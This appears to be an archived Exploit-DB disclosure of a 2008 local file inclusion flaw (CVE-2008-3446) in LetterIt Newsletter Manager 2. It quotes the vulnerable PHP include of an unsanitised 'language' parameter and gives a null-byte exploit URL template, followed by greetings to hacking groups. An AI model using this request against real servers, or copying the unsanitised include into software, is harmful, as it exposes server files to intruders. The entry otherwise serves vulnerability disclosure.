LetterIt 2 - 'Language' Local File Inclusion

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2008-07-30 
date_updated: 2016-12-21 
verified: 1 
codes: OSVDB-47249;CVE-2008-3446 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comletterit2_050924.tar.gz

====================================================================


  [o] LetterIt 2 Local File Inclusion Vulnerability

       Software : LetterIt Newsletter Manager version 2
       Vendor   : http://www.letterit.de/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


====================================================================


  [o] Vulnerable file

       inc/wysiwyg.php

        include("../language/".$_GET['language'].".php");



  [o] Exploit

       http://localhost/[path]/inc/wysiwyg.php?language=[LFI]%00


====================================================================


  [o] Greetz

       supported by irc.nob0dy.net
       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ martfella
       skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke


====================================================================

# milw0rm.com [2008-07-31]